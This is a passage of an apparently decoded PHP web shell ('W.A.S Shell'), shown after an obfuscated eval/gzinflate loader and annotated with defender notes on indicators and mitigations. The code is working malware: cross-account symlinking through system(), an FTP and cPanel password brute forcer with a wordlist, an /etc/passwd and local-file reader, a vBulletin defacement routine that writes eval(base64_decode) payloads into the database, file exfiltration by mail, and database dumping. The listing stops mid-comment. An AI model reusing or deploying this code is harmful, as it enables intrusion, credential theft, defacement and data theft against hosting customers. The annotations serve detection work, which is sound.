PHP Decode
<? eval(gzinflate(base64_decode(' 7b15Xxs58jj89/D58B6UHnbbnhjjA3PGJGAMMeGK zZEQ8vW23Y3dw..
Decoded Output download
?><?php
$head = '<!-- Edited by W.A.S -->
<html>
<head>
</script>
<title>o--{ W.A.S Shell }--o</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<STYLE>
body {
font-family: Tahoma
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 1px #333;
color: #FFF;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: Black;
color: #FFF;
}
input {
border : dashed 1px;
border-color : #333;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
select {
BORDER-RIGHT: Black 1px solid;
BORDER-TOP: #DF0000 1px solid;
BORDER-LEFT: #DF0000 1px solid;
BORDER-BOTTOM: Black 1px solid;
BORDER-color: #FFF;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
submit {
BORDER: buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #FFF;
}
textarea {
border : dashed 1px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
BODY {
SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
margin: 1px;
color: Red;
background-color: Black;
}
.main {
margin : -287px 0px 0px -490px;
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
}
.tt {
background-color: Black;
}
A:link {
COLOR: White; TEXT-DECORATION: none
}
A:visited {
COLOR: White; TEXT-DECORATION: none
}
A:hover {
color: Red; TEXT-DECORATION: none
}
A:active {
color: Red; TEXT-DECORATION: none
}
</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
document.getElementById(id).style.display = \'none\';
document.cookie=id+\'=0;\';
}
function show_div(id)
{
document.getElementById(id).style.display = \'block\';
document.cookie=id+\'=1;\';
}
function change_divst(id)
{
if (document.getElementById(id).style.display == \'none\')
show_div(id);
else
hide_div(id);
}
</script>';
// ?ln handler. Reads a local file named passwd.txt, takes the text before ":x:" on
// each line as an account name, and for every name runs `ln -s` through system() to
// create a link in the current directory pointing at /home/<name>/public_html/.
// Account names are interpolated into the shell command without escaping.
// Defender notes: on shared hosting, a passwd.txt next to a PHP file plus a cluster of
// symlinks named after local accounts is a strong cross-account exposure indicator.
// Web-server settings that only follow symlinks whose owner matches the target
// (Apache SymLinksIfOwnerMatch) and disabling system() in disable_functions limit it.
if (isset($_GET['ln'])) {
$fp = fopen('passwd.txt','r');
$fr = fread($fp,filesize('passwd.txt'));
fclose($fp);
// Capture group 1 is the login name of each passwd-style entry.
preg_match_all('/(.+?):x:(.+?)/',$fr,$explode);
foreach($explode[1] as $user) {
system("ln -s /home/$user/public_html/ $user");
}
// Redirects back to the script itself once the links have been attempted.
header("Location: ".$_SERVER['PHP_SELF']);
}
if (isset($_GET['brute'])) {
?>
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
</head>
<title>/ W.A.S @ BruteForcer v1.0 /</title>
<style>
body{margin:0px;font-style:normal;font-size:10px;color:#fff;font-family:Verdana,Arial;background-color:#000;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}
input,
.kbrtm,select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}
button{background-color: #666666; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}
body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}
a:active { outline: none; }
a:focus { -moz-outline-style: none; }
table {
border: 2px dashed #fff;
background:#000;
color: #fff;
font-weight: bold;
font-family:"Comic Sans MS";
}
</style>
<style type='text/css'>
<!--
A:link {text-decoration: none; color:#cccccc }
A:visited {text-decoration: none; color:#cccccc }
a:hover {text-decoration: none; color:Red}
-->
</style>
<?php
@ini_set('memory_limit', 1000000000000);
$connect_timeout=5;
@set_time_limit(0);
$submit = $_REQUEST['submit'];
$users = $_REQUEST['users'];
$pass = $_REQUEST['passwords'];
$target = $_REQUEST['target'];
$option = $_REQUEST['option'];
$page = $_GET['page'];
if($target == ''){
$target = 'localhost';
}
?>
<?php
print "<br><br><br><center><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='70%' bgColor=#303030 borderColorLight=#666666 border=1><tr><td width='70%'>
<br><b><center><a href='?'>Home</a> - <a href='?brute&page=bio'> About </a> - <a href='?brute&page=crack'> Brute </a> - <a href='?brute&page=users'> Get users </a><br><br></center></td></tr></table>";
if ( $page == 'bio' ){
print
"<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%'bgColor=#303030 borderColorLight=#666666 border=1><tr><td><br><center><pre>_____ ___ _ _ _
\ ___/ _ \ _| |_ __ _ _| | __| | __ _ _ __ ___ __ _
/ _|| (_) |__ | '_ \| | | | |/ _` |/ _` | '_ \ / _ ' _` |
| (__| .__/ _| | |_) | |_| | | | | | | | | |_) | | | | | |
\____\_\ |__/|_.__/|_.__/|_|_| |_|_| |_|_.__/|_| |_| |_|
</pre><br><b>###################################<br><font color=Red>/ W.A.S @ BruteForcer v1.0 /</font><br><font color=#FFCC00>/ [Edited] by W.A.S /</font></b><br>###################################</center></center><br></td></tr></table>";
exit();
}elseif( $page == 'crack'){
@ini_set('memory_limit', 1000000000000);
$connect_timeout=5;
@set_time_limit(0);
$submit = $_REQUEST['submit'];
$users = $_REQUEST['users'];
$pass = $_REQUEST['passwords'];
$target = $_REQUEST['target'];
$option = $_REQUEST['option'];
if($target == ''){
$target = 'localhost';
}
print " <div align='center'>
<form method='post' style='border: 1px solid #000000'><br><br>
<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#666666 border=1><tr><td>
<b> Target : </font><input type='text' name='target' size='16' value= $target style='border: font-family:Verdana; font-weight:bold;'></p></font></b></p>
<div align='center'><br>
<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#666666 border=1>
<tr>
<td align='center'>
<b>Username</b></td>
<td>
<p align='center'>
<b>Password</b></td>
</tr>
</table>
<p align='center'>
<textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$users</textarea>
<textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>123pass
pass123
0123456
01234567
012345678
0123456789
01234567890
123456
1234567
12345678
123456789
1234567890
111111
000000
222222
333333
444444
555555
666666
777777
888888
999999
111111
000000
123123
456456
789789
123321
456654
654321
7654321
87654321
987654321
0987654321
admin123
123admin
admin123456
123456admin
1234554321
12344321
abcdef
abcabc
!@#!@#
!@#$%^
!@#$%^&*(
!@#$$#@!</textarea><br>
<br>
<b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
<input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp ==> <input type='submit' value='brute' name='submit' ></p>
</td></tr></table></td></tr></form><p align= 'left'>";
?>
<?php
/**
 * Tries one FTP login against $host through libcurl and prints the pair when curl
 * reports no error.
 *
 * @param string $host    Target host; 'localhost' is shown as $_SERVER['SERVER_ADDR'] in the printed link.
 * @param string $user    Candidate account name.
 * @param string $pass    Candidate password.
 * @param int    $timeout Connect timeout in seconds (CURLOPT_CONNECTTIMEOUT).
 *
 * Returns nothing. On curl error 28 (timeout) it prints a message and ends the whole
 * request; any other non-zero error is treated as a failed guess and produces no output.
 *
 * Defender notes: every call opens a new FTP session, so the FTP log shows a burst of
 * failed logins coming from the web server's own address. Login throttling/lockout on
 * the FTP daemon and disabling unused FTP service blunt this. Hits are printed as
 * clear-text ftp://user:pass@host links, so they also end up in the HTTP response body.
 */
function ftp_check($host,$user,$pass,$timeout){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "ftp://$host");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
// The listing returned in $data is never used; only the curl error code is inspected.
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 ) {
print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
exit;}
elseif ( curl_errno($ch) == 0 ){
if ($host == 'localhost') {
$link = "ftp://$user:$pass@".$_SERVER['SERVER_ADDR'];
} else {
$link = "ftp://$user:$pass@".$host;
}
print "<b><font color=Red> $user </font> | <font color=Red> $pass </font> [ <a href='$link'>$link</a> ]</b><br>";}curl_close($ch);}
/**
 * Tries one HTTP Basic login against http://$host:2082 through libcurl and prints the
 * pair when curl reports no error.
 *
 * @param string $host    Target host; 'localhost' is shown as $_SERVER['SERVER_ADDR'] in the printed link.
 * @param string $user    Candidate account name.
 * @param string $pass    Candidate password.
 * @param int    $timeout Connect timeout in seconds (CURLOPT_CONNECTTIMEOUT).
 *
 * Returns nothing. CURLOPT_FAILONERROR turns HTTP status >= 400 into a curl error, so
 * error code 0 is what this code treats as an accepted login. Error 28 (timeout) ends
 * the whole request.
 *
 * Defender notes: the request goes over plain HTTP to port 2082. Expect runs of 401
 * responses in the panel's access log from the server's own address; the panel's
 * brute-force protection (cPHulk on cPanel) and not exempting local addresses from it
 * are the relevant controls.
 */
function cpanel_check($host,$user,$pass,$timeout){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
// The response body in $data is never used; only the curl error code is inspected.
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 ) {
print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
exit;}
elseif ( curl_errno($ch) == 0 ){
if ($host == 'localhost') {
$link = "http://$user:$pass@".$_SERVER['SERVER_ADDR'].":2082";
} else {
$link = "http://$user:$pass@".$host.":2082";
}
print "<b><font color=Red> $user </font> | <font color=Red> $pass </font> [ <a href='$link'>$link</a> ]</b><br>";}curl_close($ch);}
// Driver for the two check functions: splits the submitted user and password lists on
// newlines and tries every combination, so the number of outbound logins is
// (users x passwords). This branch set set_time_limit(0) earlier, so one HTTP request
// can keep a PHP worker busy for the whole run.
// Defender notes: a single long-lived PHP request that opens many connections to port
// 21 or 2082 is the runtime signature; per-request execution limits enforced outside
// PHP (web server / FPM request timeout) cut it short even though the script lifts
// PHP's own limit.
if(isset($submit) && !empty($submit)){
$userlist = explode ("\n" , $users );
$passlist = explode ("\n" , $pass );
print "<b>[ W.A.S ]# Attacking ...</font></b><br><br>";
foreach ($userlist as $user) {
$_user = trim($user);
foreach ($passlist as $password ) {
$_pass = trim($password);
// $option comes straight from the request; any value other than these two does nothing.
if($option == "ftp"){
ftp_check($target,$_user,$_pass,$connect_timeout);
}
if ($option == "cpanel")
{
cpanel_check($target,$_user,$_pass,$connect_timeout);
}
}
}
print "<br><b>[ W.A.S ]# Finished ...</font></b><br>";
}
exit();
}elseif ( $page == 'users'){
// "Get users" page: reads the file named in POST field `file` (the form pre-fills
// /etc/passwd) via curl and prints either the extracted login names or the raw content.
echo "<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%'bgColor=#303030 borderColorLight=#666666 border=1><tr><td>";
echo '<p><form name="form" action="" method="post"><input type="text" name="file" size="50" value="/etc/passwd"><input type="submit" name="hardstylez" value="Get !"></form>';
$file = $_POST['file'];
$level=0;
// Creates a directory literally named "file:" in the working directory, then one
// nested directory per component of the requested path, and finally walks back up.
// NOTE(review): this looks like a workaround for path restrictions in old PHP/curl
// builds - confirm against the PHP version in use. Nothing here removes the
// directories, so a "file:" directory tree left beside a PHP script is a useful
// on-disk artefact when hunting for this shell.
if(!file_exists("file:"))
@mkdir("file:");
@chdir("file:");
$level++;
$hardstyle = @explode("/", $file);
for($a=0;$a<count($hardstyle);$a++){
if(!empty($hardstyle[$a])){
if(!file_exists($hardstyle[$a]))
@mkdir($hardstyle[$a]);
@chdir($hardstyle[$a]);
$level++;
}
}
while($level--) chdir("..");
$ch = curl_init();
// The request path is used unvalidated in a file: URL handed to curl.
curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$result = curl_exec($ch);
echo "<textarea rows='30' cols='120' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0' >";
if ($result == FALSE)
{ die("Failed!");
} else {
// passwd-style content is reduced to the login names; anything else is echoed as-is
// (not HTML-escaped).
if (preg_match_all('/(.+?):x:(.+?)/',$result,$explode)) {
foreach($explode[1] as $user) {echo $user."\n";}
} else { echo $result;}
}
echo ' </textarea> </FONT>';
curl_close($ch);
print '</table>';
exit();
}
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
exit();
}
// ?deface handler. Prints a form asking for database host, name, user and password,
// then (on POST) overwrites vBulletin template/style rows with a PHP payload wrapper.
// Defender notes:
//  - Indicators in the forum database: `template` rows titled spacer_open or FORUMHOME,
//    or `style`.css values, containing "eval(base64_decode(" followed by the marker
//    string "[Edited] by W.A.S".
//  - The UPDATE on `style` has no WHERE clause, so every style row is overwritten and
//    stylevars/csscolors/editorstyles are blanked; recovery needs a database backup.
//  - The attacker had to supply working DB credentials, so rotate them and check how
//    config files holding them were read.
//  - Uses the mysql_* API, which was removed in PHP 7.0; this path only runs on older
//    PHP builds that still ship ext/mysql.
if(isset($_GET['deface'])) {echo $head; echo "
<title># W.A.S # | vBulletin Deface</title>
<style type='text/css'>
.style1 {
color: #FFFFFF;
}
.style2 {
font-family: Arial;
color: #FFFFFF;
}
.style3 {
text-align: center;
}
.style4 {
font-family: Arial;
}
</style>
</head>
<center>
<h2 class='style1'># W.A.S # | vBulletin Deface</h2><div id=haberler align=left><form method=POST action=''>
<p align=center class='style1'> </p>
<div class='style3'>
<span class='style2'>Host</span><font face='Arial' color='#ffffff'>:</font><span class='style1'> <input type=text name=dbh value=localhost size='15' ></span>
<font face='Arial' color='#ffffff'> Database Name:</font><span class='style1'><input type=text name=dbn size='15' ><br>
Database User</span><font face='Arial' color='#ffffff'>:</font><span class='style1'><input type=text name=dbu size='15' ></span>
<font face='Arial' color='#ffffff'> Database Pass: </font><span class='style1'><input type=text name=dbp size='16' ><br>
</span>
</div>
<center class='style1'>
<textarea name=index rows='5' cols='33' >echo '! Checked by W.A.S !';</textarea></center>
<center class='style1'><input type=submit value='Deface It!!!' ></form></center></center></body>
</center>
</html>";
// Marker string appended to every overwritten row.
$h4cker="[Edited] by W.A.S";
if (!empty($_POST['dbh']) && !empty($_POST['dbn']) && !empty($_POST['dbu']) && !empty($_POST['index']))
{
$dbh = $_POST['dbh'];
$dbn = $_POST['dbn'];
$dbu = $_POST['dbu'];
$dbp = $_POST['dbp'];
$index=str_replace("\'","'",$index);
// Wraps the base64-encoded text in a template expression that evaluates it and then
// stops page rendering.
$set_index = "{\${eval(base64_decode(\'".base64_encode($index);
//$set_index .= base64_encode("eval ('$index');");
$set_index .= "\'))}}{\${exit()}}";
mysql_connect($dbh,$dbu,$dbp) or die(mysql_error());
mysql_select_db($dbn) or die(mysql_error());
$fatal1 = "UPDATE template SET template='".$set_index."".$h4cker."' WHERE title='spacer_open'";
$fatal2 = "UPDATE template SET template='".$set_index."".$h4cker."' WHERE title='FORUMHOME'";
$fatal3 = "UPDATE style SET css='".$set_index."".$h4cker."', stylevars='', csscolors='', editorstyles=''";
$result = mysql_query($fatal1) or die (mysql_error());
$result2 = mysql_query($fatal2) or die (mysql_error());
$result3 = mysql_query($fatal3) or die (mysql_error());
if ($result && $result2 && $result3) {
echo "Okie";
}
}
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">HOME</a> ]</b></font></div>"; die();}
// Global setup for the main shell pages: removes PHP's execution-time limit, turns
// output buffering off, normalises legacy superglobals and magic quotes, and holds
// the (disabled) access gate.
$language='eng';
// 0 disables the HTTP Basic gate further down: as shipped, anyone who knows the URL
// can use every function of this script.
$auth = 0;
error_reporting(E_ALL);
// set_magic_quotes_runtime() was removed in PHP 7.0 and get_magic_quotes_gpc() in
// PHP 8.0; the listing targets PHP 4/5-era hosts.
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
$safe_mode = @ini_get('safe_mode');
// Fixed strings below ("W.A.S Edition", the footer banner) are usable as content
// signatures when scanning web roots or HTTP responses.
$version = 'W.A.S Edition';
$footer = '<div align=center><font face=Verdana size=-2><b>o---{ W.A.S Shell }---o</b></font></div>';
// Pre-4.1.0 PHP: alias the old $HTTP_*_VARS arrays to the modern superglobal names.
if(version_compare(phpversion(), '4.1.0') == -1)
{
$_POST = &$HTTP_POST_VARS;
$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
$_COOKIE = &$HTTP_COOKIE_VARS;
}
// Undo magic-quotes escaping on POST and cookie values ($_GET is not touched here).
if (@get_magic_quotes_gpc())
{
foreach ($_POST as $k=>$v)
{
$_POST[$k] = stripslashes($v);
}
foreach ($_COOKIE as $k=>$v)
{
$_COOKIE[$k] = stripslashes($v);
}
}
// Optional HTTP Basic gate: compares unsalted md5 of the supplied user and password
// against $name and $pass using loose comparison. $name is not assigned anywhere in
// the visible listing - presumably set in a variant that enables $auth; verify.
// The realm string in the 401 response is another fingerprint for this family.
if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!= $name || md5($_SERVER['PHP_AUTH_PW'])!= $pass)
{
header('WWW-Authenticate: Basic realm="W.A.S - CGG"');
header('HTTP/1.0 401 Unauthorized');
exit("<b>Contact <a href=http://xgroupvn.org/ </a> : Access Denied</b>");
}
}
// In-memory ZIP writer. addFile() appends one deflate-compressed entry; file() returns
// the finished archive as a binary string. Within this script it is only used by
// compress() to package a file before it is sent to the client.
class zipfile
{
// Local file header + compressed data for each entry, in insertion order.
var $datasec = array();
// Central-directory record for each entry.
var $ctrl_dir = array();
// End-of-central-directory signature followed by four zero bytes.
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
// Byte offset of the next local header, used in central-directory records.
var $old_offset = 0;
// Packs a Unix timestamp (0 means "now") into the 32-bit DOS date/time layout.
// Years before 1980 are clamped to 1980-01-01 00:00:00.
function unix2DosTime($unixtime = 0) {
$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
if ($timearray['year'] < 1980) {
$timearray['year'] = 1980;
$timearray['mon'] = 1;
$timearray['mday'] = 1;
$timearray['hours'] = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
}
return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
}
// Adds $data to the archive under $name (backslashes become forward slashes).
// $time is a Unix timestamp for the entry; 0 means the current time.
function addFile($data, $name, $time = 0)
{
$name = str_replace('\\', '/', $name);
$dtime = dechex($this->unix2DosTime($time));
// Re-orders the hex digits into little-endian byte order; indexes 0..7 assume
// dechex() produced eight digits.
$hexdtime = '\x' . $dtime[6] . $dtime[7]
. '\x' . $dtime[4] . $dtime[5]
. '\x' . $dtime[2] . $dtime[3]
. '\x' . $dtime[0] . $dtime[1];
// eval() is used only to turn the "\xNN" escapes into raw bytes; its input is built
// from the timestamp's hex digits above, not from request data.
eval('$hexdtime = "' . $hexdtime . '";');
// Local file header: signature, version needed, flags, method 8 (deflate), DOS time.
$fr = "\x50\x4b\x03\x04";
$fr .= "\x14\x00";
$fr .= "\x00\x00";
$fr .= "\x08\x00";
$fr .= $hexdtime;
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
// Strips the 2-byte zlib header and 4-byte trailer from the gzcompress() output.
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
$c_len = strlen($zdata);
$fr .= pack('V', $crc);
$fr .= pack('V', $c_len);
$fr .= pack('V', $unc_len);
$fr .= pack('v', strlen($name));
$fr .= pack('v', 0);
$fr .= $name;
$fr .= $zdata;
$this -> datasec[] = $fr;
// Matching central-directory record for the entry just written.
$cdrec = "\x50\x4b\x01\x02";
$cdrec .= "\x00\x00";
$cdrec .= "\x14\x00";
$cdrec .= "\x00\x00";
$cdrec .= "\x08\x00";
$cdrec .= $hexdtime;
$cdrec .= pack('V', $crc);
$cdrec .= pack('V', $c_len);
$cdrec .= pack('V', $unc_len);
$cdrec .= pack('v', strlen($name) );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('V', 32 );
$cdrec .= pack('V', $this -> old_offset );
$this -> old_offset += strlen($fr);
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}
// Returns the complete archive: all entries, the central directory, then the
// end-of-central-directory record with entry counts, directory size and offset.
function file()
{
$data = implode('', $this -> datasec);
$ctrldir = implode('', $this -> ctrl_dir);
return
$data .
$ctrldir .
$this -> eof_ctrl_dir .
pack('v', sizeof($this -> ctrl_dir)) .
pack('v', sizeof($this -> ctrl_dir)) .
pack('V', strlen($ctrldir)) .
pack('V', strlen($data)) .
"\x00\x00";
}
}
// Compresses $filedump in place according to $compress ('bzip', 'gzip' or 'zip') and
// appends the matching extension to $filename. Both are passed by reference.
// Side effects: sets the globals $mime_type and, for gzip, $content_encoding, which
// the download handler turns into response headers.
// Any other $compress value, or a missing compression function, leaves the data
// untouched and sets $mime_type to application/octet-stream.
function compress(&$filename,&$filedump,$compress)
{
global $content_encoding;
global $mime_type;
if ($compress == 'bzip' && @function_exists('bzcompress'))
{
$filename .= '.bz2';
$mime_type = 'application/x-bzip2';
$filedump = bzcompress($filedump);
}
else if ($compress == 'gzip' && @function_exists('gzencode'))
{
$filename .= '.gz';
$content_encoding = 'x-gzip';
$mime_type = 'application/x-gzip';
$filedump = gzencode($filedump);
}
else if ($compress == 'zip' && @function_exists('gzcompress'))
{
$filename .= '.zip';
$mime_type = 'application/zip';
$zipfile = new zipfile();
// The entry name inside the archive is the file name without the ".zip" just appended.
$zipfile -> addFile($filedump, substr($filename, 0, -4));
$filedump = $zipfile -> file();
}
else
{
$mime_type = 'application/octet-stream';
}
}
// Sends $attach (array with 'type', 'name' and 'content') to $to via mail(), with the
// base64-encoded content placed after the header block and an empty message body.
// Returns 1 when mail() accepts the message, 0 otherwise.
// Defender notes: this is a file-exfiltration channel that bypasses HTTP logging, so
// check the MTA log for messages submitted by the web server user. $from, the
// attachment name and type are written into the headers unfiltered.
function mailattach($to,$from,$subj,$attach)
{
$headers = "From: $from\r\n";
$headers .= "MIME-Version: 1.0\r\n";
$headers .= "Content-Type: ".$attach['type'];
$headers .= "; name=\"".$attach['name']."\"\r\n";
$headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
$headers .= chunk_split(base64_encode($attach['content']))."\r\n";
if(@mail($to,$subj,"",$headers)) { return 1; }
return 0;
}
// Thin wrapper over four legacy database client APIs (mysql_*, mssql_*, pg_*, oci*),
// selected by the string in $db. All calls are error-suppressed with @, and methods
// report status through integer return codes.
// The mysql_* and mssql_* extensions were removed in PHP 7.0, so those branches only
// work on older PHP builds.
class my_sql
{
var $host = 'localhost';
var $port = '';
var $user = '';
var $pass = '';
// Database (schema) name to select or dump.
var $base = '';
// Backend selector: 'MySQL', 'MSSQL', 'PostgreSQL' or 'Oracle'.
var $db = '';
var $connection;
// Last result/statement handle returned by query().
var $res;
var $error;
var $rows;
var $columns;
var $num_rows;
var $num_fields;
// Lines of the textual dump produced by dump().
var $dump;
// Opens a connection for the selected backend, filling in the default port when
// none was given. Returns 1 on success, 0 on failure or when the client extension
// is not available.
function connect()
{
switch($this->db)
{
case 'MySQL':
if(empty($this->port)) { $this->port = '3306'; }
if(!function_exists('mysql_connect')) return 0;
$this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
if(is_resource($this->connection)) return 1;
break;
case 'MSSQL':
if(empty($this->port)) { $this->port = '1433'; }
if(!function_exists('mssql_connect')) return 0;
$this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
if($this->connection) return 1;
break;
case 'PostgreSQL':
if(empty($this->port)) { $this->port = '5432'; }
// Connection-string values are quoted but not escaped.
$str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
if(!function_exists('pg_connect')) return 0;
$this->connection = @pg_connect($str);
if(is_resource($this->connection)) return 1;
break;
case 'Oracle':
if(!function_exists('ocilogon')) return 0;
$this->connection = @ocilogon($this->user, $this->pass, $this->base);
if(is_resource($this->connection)) return 1;
break;
}
return 0;
}
// Selects $base on MySQL/MSSQL; for PostgreSQL and Oracle it just returns 1 because
// the database is chosen at connect time. Returns 1 on success, 0 otherwise.
function select_db()
{
switch($this->db)
{
case 'MySQL':
if(@mysql_select_db($this->base,$this->connection)) return 1;
break;
case 'MSSQL':
if(@mssql_select_db($this->base,$this->connection)) return 1;
break;
case 'PostgreSQL':
return 1;
break;
case 'Oracle':
return 1;
break;
}
return 0;
}
// Runs $query unmodified apart from the MySQL prefix noted below.
// Returns 0 on error (message in $error), 1 when a result set is available,
// 2 when the statement succeeded without one (Oracle uses 2 for a non-zero row count).
function query($query)
{
$this->res=$this->error='';
switch($this->db)
{
case 'MySQL':
// Every MySQL statement is prefixed with a comment holding a NUL byte. The purpose is
// not evident from this listing; the prefix is a distinctive string to search for in
// MySQL general or audit logs.
if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
{
$this->error = @mysql_error($this->connection);
return 0;
}
else if(is_resource($this->res)) { return 1; }
return 2;
break;
case 'MSSQL':
if(false===($this->res=@mssql_query($query,$this->connection)))
{
$this->error = 'Query error';
return 0;
}
else if(@mssql_num_rows($this->res) > 0) { return 1; }
return 2;
break;
case 'PostgreSQL':
if(false===($this->res=@pg_query($this->connection,$query)))
{
$this->error = @pg_last_error($this->connection);
return 0;
}
else if(@pg_num_rows($this->res) > 0) { return 1; }
return 2;
break;
case 'Oracle':
if(false===($this->res=@ociparse($this->connection,$query)))
{
$this->error = 'Query parse error';
}
else
{
if(@ociexecute($this->res))
{
if(@ocirowcount($this->res) != 0) return 2;
return 1;
}
$error = @ocierror();
$this->error=$error['message'];
}
break;
}
return 0;
}
// Fetches every row of the last result into $rows (associative arrays), records
// $num_rows/$num_fields, frees the result and sets $columns from the first row's keys.
// Returns 1 when at least one row was fetched, 0 otherwise.
function get_result()
{
$this->rows=array();
$this->columns=array();
$this->num_rows=$this->num_fields=0;
switch($this->db)
{
case 'MySQL':
$this->num_rows=@mysql_num_rows($this->res);
$this->num_fields=@mysql_num_fields($this->res);
// The loop assigns before testing, so $rows ends with one trailing false element.
while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
@mysql_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
case 'MSSQL':
$this->num_rows=@mssql_num_rows($this->res);
$this->num_fields=@mssql_num_fields($this->res);
while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
@mssql_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
break;
case 'PostgreSQL':
$this->num_rows=@pg_num_rows($this->res);
$this->num_fields=@pg_num_fields($this->res);
while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
@pg_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
case 'Oracle':
$this->num_fields=@ocinumcols($this->res);
// Oracle has no row-count call here, so rows are counted while fetching.
while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
@ocifreestatement($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
}
return 0;
}
// Builds a textual dump of $table into $dump: a '##' comment header, then (MySQL
// only) the CREATE TABLE statement, then one INSERT per row. The Oracle branch is a
// stub. Returns 1 on success, 0 when the table name is empty, the backend is unknown,
// or a query returns no rows.
// Defender notes: this is the bulk data-theft path. The table name is concatenated
